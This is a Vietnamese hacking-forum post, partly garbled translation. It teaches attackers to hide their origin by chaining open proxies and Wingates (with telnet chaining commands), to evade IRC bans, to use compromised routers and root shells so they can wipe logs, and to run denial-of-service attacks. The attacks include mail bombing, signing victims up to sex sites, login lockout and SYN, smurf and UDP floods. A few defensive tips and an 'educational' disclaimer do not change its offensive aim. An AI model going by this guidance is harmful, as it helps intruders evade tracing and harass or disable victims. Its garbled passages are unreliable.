cuop tren mang...
1)Chống lại hacker và kỷ thuật hack toàn tập
--------------------------------------------------------------------------------
I.Trọng tâm của vấn đề là làm thế nào chống lại những hacker với những cuộc tấn công của họ để chúng không thể tóm được và vì vậy họ sử dụng những dòng *.NIX shell .Bản hướng dẫn này có thể vừa được sử dụng bởi các hacker
Các hacker sẽ học cách làm thế nào để áp đặt một cuộc tấn công và sử dụng Proxies để trợ giúp lưu lại tài khoản nặc danh . Điều hành viên sẽ học cách làm thế nào để bảo vệ chính họ khỏi bị tấn công bằng Proxiesvà chống lại Stress .Nếu bạn không biết Proxy là gì hoặc làm thế nào để sử dụng Wingate,bạn cần đọc phần hướng dẫn .Người sử dụng Wingate,Proxy,Shell
Tôi sẽ xem xét kỹ một vài trường hợp ngẫu nhiên như việc sử dụng Router coi như Wingate,và sử dụng Wingate để tấn công những phiên IRC của bạn
1.Chống lại các cuộc tấn công
Ở đây có một vài cách để chống lại cuộc tấn công của bạn . Đôi lúc nó còn tuỳ vào việc bạn muốn thực hiện cuộc tấn công như thế nào ? đôi lúc còn tuỳ thuộc vào cái mà bạn chịu trách nhiệm .tôi sẽ giới thiệu cho bạn ba cách để chống lại những cuộc tấn công .tôi sẽ không sử dụng Router bằng Proxy từ khi Wingate là cực dễ để có thể tiếp nhận được .Và tôi sẽ không xem xét lại việc chống lại cuộc tấn công của bạn bằng FTP bởi vì tất cả những chương trình FTP đều có lỗ hổng .không chỉ những hacker sẽ đọc phần kế tiếp mà còn sẽ là những điều hành viên ,họ muốn bảo vệ chính họ ,từ việc bắt đầu sử dụng một cuộc tấn công bảo mật Proxy của họ và Wingate có thể giúp đỡ học trong việc chống lại rắc rối với những hacker lạm dụng nó . Điều này thể thể đôi khi tiết kiệm thời gian và tránh được sự quấy rầy bởi vì bạn không phải đụng chạm đến Điều hành viên ,người mà cố gắng tìm ra một hacker kẻ tấn công bạn sử dụng mạng của bạn để chống lại họ
QUOTE
Chống lại thông qua Proxy
-Chống lại thông qua Wingate
-Chống lại và biên dịch cuộc tấn công với shell
-Chống lại thông qua Proxy
Proxy là cách cơ bản nhất cho stay anonymous khi duyệt web .Chúng được sử dụng web browser của bạn để phản hồi dữ liệu mà bạn đang tải về .Vì thế khi bạn gửi dữ liệu mà bạn đang lấy ở một trang web thì việc đầu tiên nó sẽ được thông qua Proxy và sau đó mới tới trang web
[your computer]->[proxy]->[website]
Một vài loại proxy , được biết như "cache'ing proxies".Nó sẽ giữ việc sao chép tại máy local của website , điều này sẽ tạo cho việc kết nối giữa bạn và proxy trở nên rất nhanh .vì thế nó thay thế cho việc truy vấn tới website ,proxy chỉ việc lấy từ trong cache ra mặc đù điều này có thể có một vấn đề như tôi đã có kinh nghiệm đầu tay khi sử dụng công nghệ không ổn định chúng ta đặt một đoạn script mà nó cho phép kiểm tra những người sử dụng địa chỉ e-mail hình ảnh ,website ,tên , đất nước,v...vTất cả thông tin không bắt buộc nhưng đoạn script sẽ kiểm tra nếu bạn là một điều hành viên của một công nghệ không ổn định và nếu bạn là người điều hành viên đó thì nó sẽ hiển thị pass người dùng ,cho phép bạn thay đổi tình trạng,bây giờ một người nào đó tên là MaAaX thấy được 1 cache proxy mà nó thi hành việc lưu trữ trang này ,chẳng những nó được lưu trữ mà còn được điều hành viên lưu trữ .Một vài điều hành viên của một vài trang phải sử dụng proxy để mở một đoạn script ,vì thế proxy ghi lại những gì anh ta mở .Và MaAaXđã được thông báo tới một vài người tất cả những người không phải là điều hành viên của site đó .Người đó đã sử dụng proxy để lấy một pass của điều hành viên từ trang lưu trữ đó . Đây có phải là một câu chuyện đạo đức hay không ! Đừng để cho những thông tin nhạy cảm đó lộ cho mọi người trông thấy ,tôi sẽ hướng dẫn việc không sử dụng 1 pro xy khi đang điều hành 1 site thông qua http và luôn đặt tất cả những đọan script có thể sử dụng bởi điều hành viên,trong một .htaccess thư mục bảo vệ proxy rất dễ tìm thấy và rất dễ sử dụng . để tìm chúng bằng cách sử dụng chương trình được gọi là proxy hunter .Chương trình này sẽ quét một bề mặtrộng của những IP cho những proxy mở .Khi đó chúng sẽ thông báo cho bạn vì thế bạn cố gắng thử chúng xem chúng có thể đáp ứng được user name và pass ,hoặc coi bạn có cần phải thông qua username ,pass,một cách khác là cứ tra sét web trên danh sách list proxy 1 và site tuyệt vời cho cách này là
QUOTE
Cyberarmy's proxy list
Roswell's proxy list
Dừng trong chờ vào proxy có thể tồn tại mãi mãi ,nếu có một cái chết đi thì thử cái khác ,rất dễ dàng có thể lập được một sự an toàn cho máy proxy server của bạn cũng rất dd6ẽ dàng đạt tới một danh mục hạn chế ai có thể sử dụng nó ,bởi vậy như trong tất cả các chương trình hãy kiểm tra để biết chổ yếu của bảo mật kém trong bản thân của máy proxy server và chổ yếu trong firewall của bạn nơi bạn đặt một danh sách truy cập cho máy phuc vụ sử dụng proxy
Để sử dụng proxy bạn cần cài đặt Browser của bạn để chống lại chúng .trong Internet Explorer bạn click Tool ->Internet Options....->Connections->setting....->check"usea proxy server for this connection"->file in IP hoặc host name và số port và sau đó nhấn OK và OK
Để cài đặt Nescape sử dụng sử chỉnh sửa danh sách proxy
CODE
edit->Preferences->advanced->proxies->"Manual proxy configuration"
sau đó điền vào trong host name hoặc IP và số port
Trong Lynx bạn sẽ tránh làm điều đó tại dòng lệnh
QUOTE
http_proxy=http://proxy.com:80;export http_proxy;exec lynx or exec Mosaic
Bây giờ để công nhận Proxy đó hoạt động hãy đến site mà nó hiển thị tại mội trường server thay đổi từ một script perl/php
http://www.cyberarmy/cgi/whoami.pl
một proxy tốt thì mỗi ngày đều sử dụng được nó nhưng cho dù bạn biết rõ hơn đôi chút về điều đó (tôi thây nụ cười đã nở trên môi của bạn )bạn cần sử dụng một kỹ thuật gọi là mắc xích proxy ,cái điều xảy ra là bạn phải nhờ vả vào thông tin chuyển dịch từ proxy này sang proxy khác từ cái khác sang cái khác ,cho đến khi nó tận cùng để làm được điều đó rất đơn giản nhưng một số proxy không hỗ trợ điều đó những chương trình khác bao gồm một proxy thì chậm ,làm cho thời gian kết nối bị ngắ quảng ,phải tìm 4 hoặc 5 proxy khác ,hầu hết mọi thứ đuề diễn ra trên browser,hãy đặt proxy trên thanh địa chỉ
QUOTE
http://proxy.com:80/http://proxỳ.c...ttp://site.com
điều này sẽ kết nối bạn tới site.com sử dụng 3 proxy và một bạn đã đặt trong cấu hình của bạn (Option,Preference...cái mà chúng tôi đã hướng dẫn bên trên )
QUOTE
http://proxy.com:80--http://site.com
là còn hoạt động ,nhưng từ kinh nghiệm của tôi thì nó co khuynh hướng là proxy server hổ trợ kém ,bây giờ thì tôi nói về proxy có thể sử dụng sự kết nối trang webđể ngăn chặn.tôi muốn nói là một trang web của bạn không thể sử dụng http proxy thông thường ngoại trừ por 80 .Nếu bạn muốn ngăn chặn các port khác thì hãy thử wingate.
Vì vậy mà cho dẫu bạn sử dụng 1 exploit để áp đạt 1 cuộc tấn công và bạn quá lười để sử dụng Wingate để kết nối vào shell của bạn ,bạn có thể sử dụng những cái như rain.forest.puppy'slibwhisker,bởi vì việc thếm sự hổ trợ proxy cho scriptperl dễ dàng,bạn có thể có được libwhisker tại http://www.wiretrip.net/rfp/bins/lib.../libwhisker.pm
Tôi chưa hực sự tìm ra cho mộtt phien bản c/c++của một vài cái tương tự ,bởi vì việc kết nối cho một shell thì đúng là đơn giản ,nhưng nếu người nào biết một cái nào đó thì vui lòng gởi tới [email protected]
Vấn đề sau cùng tôi sẽ xem xét lại cái proxy là liên kết chúng lại với nhau .Hacker đã sử dụng điều này ,vì vậy họ có nhiều sự bảo vệ hơn khi tấn công vào một script sẳn có vượt qua port 80 để làm được điều này thì bạn cần phải đặt
proxy1 proxy 2 proxy 3 trước URL hoặc là bạn có thể sử dụng một chương trình đa proxy để nối các proxy nặc danh lại với nhau .Thế nào là 1 proxy nặc danh Đó là một proxy báo trước thông tin về bạn .Phần chính yếu của những thông tin mà những hacker muốn giữ bí mật là địa chỉ IP của họ khi một proxy báo trước điều này cho máy thì người ta hiểu nó là X-Forward-for.Nó là phần đầu trong một gói báo cho biêt mục đích là proxy sẽ gửi thông tin cho dạng máy nào .Proxy năc danh sẽ để lại một khoảng trống của phần đầu X-Forward-For để mục đích không có nghĩa ,nơi mà việc tấn công xảy ra .Bạn có thể kiểm tra xem Proxy đó có phải là nặc danh hay không tại :
http://cyberarmy.com/cgi/whoami.pl
Chống lại nhờ Wingate
Wingate là một kiểu proxy mà nó cho phép bạn tạo một kế nối telnet .Chúng nó được chỉ định sử dụng để cho các máy tính tiếp nhận internet dựa vào máy khác nhưng vì có nhiều loại Wingate cho phép bất cứ ai nối mạng mà không cần pass ,nên các hacker có thể phát hiện ra được (và những người khác cũng bị)
QUOTE
[Hacker computer]->[Wingate]->[Destination]
Snazzy ascii chỉ ra làm thế nào dữ liệu của bạn vượt qua được cổng Wingate và đến đích .Vì thế điểm đến sẽ gặp nó tưởng chừng như dữ liệu này đi từ cổng Wingate .Nếu bạn không thấy được làm thế nào những hacker có thể sử dụng điều này cho lợi ích riêng của chúng thì để t6i giải thích cho bạn .Hacker muốn ẩn IP của họ ,họ không muốn bất cứ ai biết họ đến từ đâu . Đây là hai điều mà không thể ngăn chặn được cuộc tấn công dễ dàng và vì vậy họ không gặp khó khăn nào ,nếu như họ bị bắt.Sử dụng Wingate có mục đích là che IP của hacker ,thay vào đó là nó thấy được IP của Wingate ,phần lớn các hacjer sử du5ng 3 wingate lúc tấn công , để chỉ mong là an toàn .Là bởi vì nếu một người điều hành bắt được một nổ lực tấn công nào và liên hệ với file logs của Wingate ,có thể sử dụng để tìm ra các IP của hacker ,vì thế nếu như 5 Wingate có nghĩa là nhiều khó khăn hơn để cho điều hành viên bị tấn cống phải vượt qua để tìm cho được kẻtấn công và nhiều cơ hội là file logs se không được giữ lại hoặc bị xoá do những điều hành viên Wingate
Đối phó với việc tấn công gây rối của Wingate là không những là lý do kẻ tấn công muốn sử dụng .Họ hoàn toàn khéo léo khi tiếp tuc trên một số máy IRC server .Quan điểm căn bản được đem ứng dụng là dữ liệu được đánh bật ra khỏi Wingatevà rồi gởi đến nơi nhận vì thê server IRC sẽ thấy kết nối đó như đến từ một Wingate . Điều này sẽ cho phép các hacker vượt qua được rào cản ,vượt qua glines,và giấu mình đối với kẻ khác ,tạo ra một sự phát triển ,.v..vKiểm tra những sự lựa chọn của bạn trong Client IRC để hình dung ra làm thế nào sử dụng chúng .coi là một Sock 4 tường lửa trong Options )bởi vì chúng rất hữu ích trên IRC nhiều người sử dụng IRC có khuynh hướng sử dụng Wingate , đây là lý do tai sao tôi đặt ra một cổng quét đơn giản cho Irssi,cổng quét này đã được chỉnh sửa chỉ để tìm cổng 23 và 1080 đó là port phổ biến nhất khi sử dụng Wingate ,23 là cổng Telnet ,1080 là sock .Cái mà nó làm là tập hợp các IP của người ta khi đó họ đi vào một kênh và khi bạn mở được mộtlệnh trên scan thì nó sẽ kiểm ra được danh sách của IP dành sử dụng cho Wingate sẳn có . Đồng thời cũng rất dễ dàng cho việc sử dụng các Script cho các MIRC làm điều này ,một công cụ Google sẽ truy tìm công cụ MIRC Wingate .Bạn có thể sử dụng các công cụ mà nó quét những block rộng của IP để Wingae sử dụng các công cụ giống như là Wingate scaner .Sau đây là một cách tìm Wingate .Cho mạng của chúng để chia cắt băng thông của chúng và bởi vì cáp có IP tỉnh và chúng không thay đổi .Vì vậy chúng ta cứ gõ lệnh /whois user cho những người đang ở trên mạng để bắt IP của chúng và rồi kiểm tra all.nettols.com (sử dụng "smart whois") để có được hàng IP ISP và tôi quét cho Wingate
Wingate có ý định sẽ tăng giảm trong cả tiếng .Bởi vì người ta chỉ cần chúng trong một chút và khi người ta biết được thì họ sẽ có rất nhiều lưu lượng thông tin tin sử dụng chúng để chống lại ,vì vậy thấy tốn nhiều băng thông thì họ rất yên tâm về cái cổng đó hoặc lấy nó xuống .Do điều này bạn cần phải quét cho các Wingate liên tục .Một lý do khác tại sao IRC làm việc tốt để tìm các Wingate ,bạn phải để cho người khác tìm chúng cho bạn không có nhiều hacker chỉ sử dụng 1 Wingate khi học tấn công mình . Đây là lý do làm thế nào sử dụng 4 Wingate để hoạt động
QUOTE
[hacker computer]->[wingate]-> [wingate]-> [wingate]-> [wingate]-[destination]
Sử dụng đa Wingate cho 1 hacker ,họ sẽ không sử dụng 1 cái đâu ,là bởi vì nó sẽ dễ dàng lộ vết nhưng sử dụng nhiều wingate thì làm cho các sự việc chậm hơn .Bất cứ cái gì trên 4 Wingate và dưới 10 Wingate thì đó là bình thường
Vì vậy sau khi bạn quét(cái này bạn phải kiên nhẩn )và được 1 vài Wingate ,làm thế nào bạn kết nối và sử dụng chúng . Đây là điều đơn giản,nhưng điều này có khuynh hướng bị tra xét suốt thời gian trên bảng thông tin và trong chatroom . Ở bất cứ nơi nào khi bạn telnet 1 wingate thì bạn cần có IP hoặc hostname của nó và port mà Wingate đi qua ,thông thường cổng là 23 hoặc 1080 .Bây giờ chúng ta chỉ có thể dùng những cổng đó những cổng ,nó không đòi hỏi tên người sử dụng và pass để đăng nhập .Chỉ cần đơn giản thoát khỏi telnet và kết nối với IP và Port ,chờ cho sự kết nối cho đến khi xuất hiện
QUOTE
Wingate >
Nếu đã đăng nhập vào vài loại nhưng không thể sử dụng ,thì đây là 1 cách mà nhà điều hành Wingate có thể tự bảo vệ mình có thể tin vào pass che chở cho Wingate và những Hacker ngẫu nhiên không thể sử dụng chúng ,không chỉ hacker có thể sử dụng Wingate của bạn ,nhưng những kẻ quấy rối thường sử chúng có rất nhiều những spammer gửi hàng ngàn e-mail thông qua Wingate của bạn tức là con đường chắc chắn có thể đưa IP ISP của bạn huỷ bỏ tài khoản của bạn .Ngoài việc phải thêm vào pass bạn còn có thể làm Wingate bằng cách cho phép máy bạn hoạt động trên mạng của bạn , để đạt đến điểm đó . Đó là cách giành cho Gatekeeper
QUOTE
login as Administrator on GateKeeper
Policies -> Default Policies -> Users can access services -> select everyone
Location -> Specify locations from where this recipient has rights ->
add 127.0.0.1 and 192.168.0.* (or whatever ip range your network uses).
To secure Deerfield's wingate simply upgrade to 3.x home version. The home version of 3.x doesn't let anyone connect at default. It's now configured securely by default
There are also other terminal's that will appear, it is not allways "Wingate>". It could be anything, Wingate> is just default on some.
We got connected, now to use the wingate. Wingates by default will telnet to any ip port you enter, so try to telnet to a server you know is up:
Wingate> 204.42.253.18:23
Bây giờ nếu bạn gặp phải một lỗi nào có ý nghĩa là một cài gì đó khác sai trái so với IP:Port bạn đưa vào thì IP:Port sẽ down ,hoặc Wingate sẽ không hoạt động .Bởi vậy bạn phải cố gắng telnet IP:Port vì Wingate đó có thể sẽ không telnet như mặc định vì thế .Chúng ta sẽ có được 1 danh sách wingate còn hoạt động không có Wingate nào phải thông qua pass bằng cách gõ liên kết chúng .Chúng hãy nói là chúng ta có Wingate
QUOTE
203.43.25.104 port 23
214.133.200.20 port 1080
180.23.56.93 port 23
194.51.107.68 port 23
To link these we would telnet into the first one:
telnet 203.43.25.104 23
Sparky's server 1.03>
Then enter in the iport of the next one on the list.
Sparky's server 1.03> 214.133.200.20 1080
CDD Proxy Server>
and link the rest..
CDD Proxy Server> 180.23.56.93 23
welcome to 180.23.56.93: 194.51.107.68 23
Bây giờ một hacker có thể telnet vào trong một tài khoản shell do bởi Wingate sau cùng và nhào vào tấn công ,hoặc là nếu như chúng biết làm thế nào để một vài chương trình socket khác thì chúng có thể bắt đầu tự thâm nhập vào các Wingate .Bước kế tiếp ,toi sẽ xem xét lại là, thế nào một hacker có thể sử dụng 1 shell để tạo ra cuộc tấn công .Tôi có nghe một số người nói rằng router co thể đuợc dùng như một Wingate ma có được dùng như 1 Wingate mà cá nhân tôi chưa bao giờ làm điều này bởi vì lúc nào cũng có nhiều Wingate để dùng nếu bạn chỉ quét .Nhưng sử dụng một router như một Win gate là một công việc lý thú vì có nhiều lý do .Thứ nhất,một router có nhiều traffic đến nỗi Điều hành viên chắc sẽ không biết liệu nó có được sử dụng để ngăn chặn một cuộc tấn công hay không ?Các router không có files logs mặc định và bởi vì chúng có nhiều traffic không có nhiều Điều hành viên đưa mọi việc vàođiều này có nghĩa là người ta có it cơ hội của việc theo dõi dấu vết của hacker .Router hầu như lúc nào cũng bật lên .Và có một kết nối nhanh ,vì vậy nếu bạn có ít router ,hoạt động như những wingate mà bạn không cần phải quét cho những cái mới nhiều hơn
.Bây giờ đừng có tìm kiếm router nữa trước khi bạn có thể sử dụng 1 router như một Wingate bạn cần đạt tới để dùng telnet trên nó
Không giống Wingae không giống có thể đôi lúc cho phép bất cứ người nào chạy telnet trên nó ,còn các router thì không .Bạn se cần hack vào trong router để có thể sử dụng telnet trên nó .Dĩ nhiên số lương của router có những pass mặc định hoặc là những lỗ hổng đơn giản hầu như vượt ra khỏi tầm hiểu biết của tôi.Cũng vậy để ghi nhận ,nó có thể là một ý nghĩ tốt khi telnet trực tiếp vàotrong router.Như là Wingate đầu tiên của bạn .Nếu Điều hành viên không thấyra được lối vào của bạn ,bạn phải rời khỏi IP thật của bạn .Hacker ngay lập tức chắc chắn sẽ sử dụng một wingate bình thường hoặc trươc khi bạn kết nối với một router có thỏa hiệp ,không cần nói ,nếu bạn là một điều hành viên của một riuter thì bạn phải tin chắc là bạn phải giữ cho nó chặc chẽ,không những các hacker có thể dùi vào mạng của bạn ,theo dõi pass điều khiển dữ liệu của bạn và thường thường tạo ra một việc làm tồi tệ ,mà chúng còn sử dụn router của bạn như là bệ phóng cho những lần tấn công tới của chúng
Một cách dùng cho Wingate khác là sử dụng chúng để chống lại một kết nối IRC.Phần lớn những Sock bình thường được sử dụng cho irc.Chúng rất giống với các wingate nhưng chủ yếu sử dụng ở firewall cho phép những kết nối rõ ràng .Sock thường chạy trên 1080. Để chống lại kết nối của bạn đến một máy phục vụ IRC có Wingate hoặc Sock thì bạn hãy gõ trong Client IRC
QUOTE
/server win.gate.com 23
/quote irc.box.sk 6667
/quote user grendel****s 123.123.123.123 b0iler :ban evader
/quote nick b0iler2
Rồi sử dụng IRC giống bình thường bạn sẽ có IP hoặc host name của một wingate .Toi tin nếu bạn sử dụng MIRC bạn có thể đến
QUOTE
file ->option ->connect->firewall
và rồi cố nhập vào IP của Wingate và cổng và kiểm tra "use sock firewall"(sửa dùm lỗi nếu tôi sai ).nếu bạn sử dụng x-chat,thì hãy thử setting->setup->IRC->proxy server ->điền vào IP và port và chọn kiểu tương tự đã cấu hình cho Wingate .Bạn có thể sử dụng bnc (chữ này thay thế cho Bonce) để trả lời kết nối của bạn đến một máy Server IRC .Cũng giống như proxy nếu bạn không muốn người ta kết nối tới Wingate của bạn .Hãy cài đặtt một danh mục cấm trên firewall .Mặc dù username và pass là một ý nghĩ tốt khi nó đến Wingate
Shell Account-Tài khoản shell
Một tài khoản shell là chỉ dẫn đến một máy tính cách xa .NHững người sử dụng có thể kết nối chúng và phát lệnh giống hệt như chúng nó đang có ở bàn phím ở máy . Điều này có nhĩa là các hacker cũng có thể phát lệnh,và người ta thường sử dụng shell ccount như là một phương pháp để chống lại những cuộc tấn công Thường thì tài khoản shell được sử dụng cùng với Wingate và hacker sử dụng nó để đưa ra cuộc tấn công các hacker sẽ không sử dụng shell miễn phí như là nether.net hoặc hobittion.org ,bởi vì học không cần và họ cũng không có khả ng8ang xoá bỏ files logs với một tài khoản của người sử dụng bình thường .nếu họ phải sử dụng một trong những shell mà điều hành viên có thể dễ dàng kiểm tra được trong files logs và xem coi chúng có được them vào không .Vì thế các hacker có thể sử dụng cái mà người ta biềt như là root shell , đây là những hệ thống các hacker biết rõ và nắm được chúng . Điều này cho phép họ xoá bỏ files logs cần thiết của những cuộc tấn công của họ
Và để chúng có đầy đủ thông access đến những công cụ *.NIX,những công cụ mà hacker cần là sự hỗ trợ raw packet,nmap và tất cả những chuơng trình nghe khác ,một trình biên dịch C ,một trình biên dịch perl và những phát hiện những cái này trở thành tiêu chu6ảncho phần lớn các *.NIX boxes ,vì thế làm *.NIX rất là có giá trị đối với hacker .Mặc dù phần lớn se có *.NIX thiết lập trên máy tính của họ ,họ cũng có thể còn sử dụng shell bởi vì chúng có những kết nối nhanh hơn vì cho phép layer khác bảo vệ Wingate . Đây là một Ví dụ nói về việc làm thế nào hacker sử dụng 1 wingate với 3 shell
QUOTE
[hacker computer]->[wingate]-> [wingate]-> [wingate]->[shell]-> [shell]->[target]
Để nhập vào một shell thì một hacker có thể sử dụng telnet hoặc họ có thể sử dụng bất cứ cái gì học muốn,hoặc ssh .ssh sẽ cho phép họ kết nối an toàn . Điều hành viên đơn giản là telnet ,owned.com:5742 sẽ cho phép chúng thâm nhập vào ,nếu chúng thiết lập được telnet và port 5742.Nếu hệ thống của bạn được mọi người biết thì nó cũng được sử dụng như một shell dành cho các hacker trong các đợt tấn công khác.Có những tài khoản shell miễn phí dành cho những hacker mới ,sử dụng lại .Tôi nhấn mạnh rằng những cái này được đưa lên màn hình và bạn chỉ có thể lấy được tài khoản người dùng .Vì vậynhững thứ mà người ta đã đăng nhập và bật một giới hạn .Dừng sử dụng lại chúng để tấn công .Cái mà một hacker muốn là một root shell đầy đủ quyền root cho phép hacker hoàn toàn tra đuợc mọi thứ trên máy tính .Raw Socket là một điều quan trọng , đi đến để chỉnh sủa logs khác .Nếu bạn có thể chỉnh sửa log ở trong root shell thì
điều này có nghĩa là tầt cả những khó khăn nhiều hơn cho tất cả những khó Khăn nhiều hơn cho bầt cứ ai tìm ra dấu vết của bạn ,nếu bạn sử dụng shell file hoặc một tài khoản người dùng ở hộp bạn không thể chỉnh sửa và sẽ là một nhược điểmcần phải được vạch ra lúc nào cũng sử dụng phần lớn Wingate giúp bạn thoát khỏi rắc rối .Phần lớn shell mà bạn muốn điều khiển *.NIX,vì vậy bạn cần phải học các lệnh của *.NIX cũng đồng thời thời phải biết file nào làm gì ?sẽ giúp cho bạn hiểu được ,tự mình biết làm thế nào giấu đi và làm thế nào kiện toàn hệ thống theo cách bạn muốn ,cài đặt 1 linux hoặc đảm bảo đựoc cái máy của bạn sẽ giúp cho bạn hiểurõ hơn làm thế nào để thâm nhập và đột nhập vào linux và bảo vệ an toàn cho nó . Để giúp bạn học *.NIX . Ở đây là một vài hướng dẫn thật sự tốt
QUOTE
http://unixhelp.ed.ac.uk/- A very easy and detailed step by step guide to getting started with Unix, with examples, solution to problems, and some cool facts.
http://www.mines.utah.edu/-wmgg/Geol...tutorial.html- A short and sweet Unix tutorial to help with the basic commands.
http://www.belgarath.demon.co.uk/guide/- A very nice guide that takes things slow and uses helpful pictures to explain things.
http://www.linuxnewbie.org/- A very helpful stop for anyone new to linux, it has many helpful files.
Làm thế nào bạn ngăn chặn hacker không cho sử dụng hệ thống của bạn ?
Đây là một câu hỏi sâu sắc bởi vì bạn cần hoàn tất việc bảo mật máy tính của bạn để ngăn chặn họ không thể xâm nhập vào máy bạn ,hãy đọc trên linux security .Firewall và IPS .Tất nhiên là hãy hành động trước khi hacker thâm nhập .An toàn cho máy tính của bạn ,sử dụng tripwire và snort'just case .Một cách để bạn tóm chúng là cài đặt phần mềm điều khiển đăng nhập máy tính .Và sẽ cho phép bạn có thoát ra khỏi tất cả mọi thứ mà họ làm ,bạn phải cài đặt bất cứ máy nào với inetd và syslog và thay đổi cấu hình file để có được
QUOTE
# /etc/syslog.conf file
*.* @213.165.52.61
Cho những thông tin cài đặt một chế độ điều khiển bảo mật và cố gắng loki's guide .Một điều tôi muốn nhấn mạnh về cách sử dụng shell từ một máy khác là chúng nó có thể chứa mọi thứ bạn làm và tập hợp những tên dùng của bạn ,những pass cho email của bạn ,những tài khoản bị tấn công ,site,ftp,nick serv.và bất cứ cái gì khác bạn cần phải chuyển đó là một thủ thuật chuyền qua nhauđể dựng lên lên một Wingate và đặt nó lên danh mục website còn chờ đợi người ta đăng nhập vào những tài khoản đã bị hack của họ.Tôi cũng đọc một vài nơi cho biết rằng chính phủ cài đặt 1 Wingate để tóm những hacker .Tôi không biết sự thật ra làm sao ,nhưng đó là điều chắc chắn đó là cách tốt nhất để làm nản chỉ những tên hacker
__________________
2)THẢO LUẬN VỀ HACKER
Trả lời hacking & Thảo luận về hack
--------------------------------------------------------------------------------
Thân chào tất cả các bạn .khi đưa lên chuyên mục này mình cũng mong rằng các bạn sẽ giúp đỡ mình nhiều hơn trong việc xây dựng một topic hack...
Lời ngõ:
ĐỂ TRỞ THÀNH MỘT HACKER CHÍNH HIỆU
Cách thức tấn công một trang web mà các hacker thường sử dụng có nhiều loại, cung nhu nhiều phương thức khac nhau. Ví dụ như đột nhập vào máy chủ bằng pass cua Administrator, thay đổi nội dung của trang web, điển hình của vi dụ này la trường hợp một hacker 17 tuổi người Thủy Điện đã đột nhập được vào máy chủ của Bộ Quốc Phòng Mỹ, thay đổi toàn bộ nội dung của trang web. Một phương thức nữa cũng rất được các hacker dùng đê tấn công máy chủ, đó là kiểu tấn công DOS, tôi sẽ nói Dos la gì o phần dưới đây, làm tê liệt hoàn toàn may chủ, khiến người dùng không thể truy cập vao internet được....Ngoài ra đối với một hacker không chỉ co tấn công server vi nếu chi có thế thì công việc quá chán, việc làm của kẻ gọi la hacker còn la tạo ra vius tấn công vao máy tinh của người khác mà muc đich có nhiều khi chỉ đơn giản là thử cho biết , Sau đây tôi sẽ giới thiệu với các bạn một vài cách cơ bản để có thể trở thành hacker,tất nhiên để có thể trở thành một hacker không thể chỉ là copy and paste, ma ban cần phải học để có thể tụ bản thân mình co thể tạo ra virus, hay tấn công vào một server, nhưng trong khoang thời gian chờ học thành tài chúng ta thử quậy một chút xem sao. Nhũng bài viết của tui trong trang web này đều dựa trên những sưu tầm và tham khảo trên các trang web về hacker trong và ngoài nước Nhật .
Khuyến cáo : những bai viết của tui ở trang web nay nhằm mục đích học tập và trao đổi kinh nghiệm, không nhằm bất cứ mục đich phá hoại nào khác. Các bạn hoàn toàn co quyền sử dụng nội dung bài viết này với bất kỳ mục đích gì, trừ việc cướp người yêu của tui )), cũng như tự chịu trách nhiệm về hành động...nông nổi của mình, chúc thành công!!!
Deny of Attcack, tấn công từ chối dịch vụ (DOS), đây là những điểm cơ bản nhất về tấn công từ chối dịch vụ.
Có 2 cách để tấn công từ chối dịch vụ là kiểu lame (tạm dịch là kiểu dành cho những kẻ trình độ thấp) và elite (cách thức tiên tiến):Kiểu lame
Spam hay còn gọi là bom thư
--------------------------------------------------------------------------------
là kĩ thuật làm cho hòm thư của người khác bị lụt bởi các bức thư, đây là một trong những dạng thấp nhất của DOS. Mọi người đều có thể lên mạng để kiếm vài chương trình boom thư như UNA hoặc KABOOOM , điền hòm thư của nạn nhân và ... gửi thư. Hòm thư của nạn nhân sẽ đầy ắp thư hoặc có 1 cách đơn giản hơn đó là đăng kí địa chỉ của hắn với một site sex, hòm thư của hắn sẽ bị boom mà bạn chẳng cần phải làm gì cả.
Nếu như nạn nhân là admin của một site nào đó thì bằng cách boom thư bạn đã tiêu tốn một lượng lớn không gian đĩa cứng của hắn.
Đăng nhập liên tiếp: giả sử một mail server cho phép bạn đăng nhập một số ít lần và bạn biết tên đăng nhập của hắn, bạn có thể dùng một chương trình để đăng nhập liên tiếp, khi đó nạn nhân sẽ không thể đăng nhập vào hòm thư, như vậy là bạn đã khoá đường vào của hắn.
Bây giờ thì sẽ là những cách tiên tiến hơn nhưng cũng đòi hỏi ở bạn trình độ và sự thông minh của bạn
Tràn Syn
Đây là cách tấn công vào phương thức bắt tay của TCP/IP
Trước tiên chúng ta hãy tìm hiểu một chút về TCP/IP
Cách bình thường:-
Syn-packet được gửi tới máy chủ bởi máy khách có ý định thiết lập kết nối
SYN
Máy khách --------------> Máy chủ
Ở bước thứ 2 máy chủ sẽ trả lời với một gói SYN/Ack tới máy khách
SYN/ACK
Máy khách <-------------- Máy chủ
Bước thứ 3 và là bước cuối cùng.
Máy khách trả lời bằng một gói ack tới máy chủ và cơ chế bắt tay ba bước được hoàn thành
Bây giờ đến phần tấn công
Nhiều Syn-packet được gửi tới máy chủ thông qua một địa chỉ IP giả (địa chỉ IP chết hoặc không có), sau đó điều gì xảy ra, máy chủ sẽ trả lời với gói syn/ack và máy chủ đợi gói ack xác nhận. Nhưng vì địa chỉ IP không tồn tại nên nó vẫn phải chờ đợi, do vậy nó trì hoãn và tiêu tốn tài nguyên của hệ thống và làm cho hệ thống bị treo hoặc khởi động lại.
Land attack
Tấn công kiểu land attack cũng giống như tấn công kiểu tràn Syn nhưng thay bởi địa chỉ IP giả mạo hoặc chết thì nó sử dụng chính ngay IP của mục tiêu. Nó tạo ra một vong lặp vô tận và hệ thống đích bị phá vỡ. Nhưng hầu hết hệ thộng đều được thiết lập để chống lại kiểu tấn công này.
Smurf Attack
Là một dạng tấn công kiểu brute force (hàng loạt), trong đó một số lượng khổng lồ các router (định tuyến) sử dụng địa chỉ IP giả từ bên trong mạng đích, do đó khi nó nhận tín hiệu ping (thăm dò) nó sẽ phản hồi và làm lụt mạng. Và làm ngưng trệ giao thông mạng.
Lụt Udp
Đây là dạng tấn công 2 hệ thống đích và có thể sử dụng để ngừng các dịch vụ của 2 hệ thống. Cả 2 hệ thống được kết nối tới nhau, một tạo ra một chuỗi các kí tự cho mỗi gói nhận, theo cách nói khác là tạo ra các kí tự yêu cầu UDP trong khi đó hệ thống còn lại sẽ phản xạ lại mọi thông điệp mà nó nhận được. Do vậy tạo nên một vòng lặp vô hạn giữa 2 hệ thống, mọi dịch vụ khác giữa chúng bị tê liệt.
Ping of death
Kiểu tấn công này sẽ không làm việc được đối với các máy chủ đã được thiết lập để phòng ngừa nó. Trong kiểu tấn công này hệ thống đích được thăm dò bởi một gói vượt quá kích thước bình thường cho phép bởi giao thức tcp/ip và sẽ làm cho hệ thống đích bị treo hoặc khởi động lại
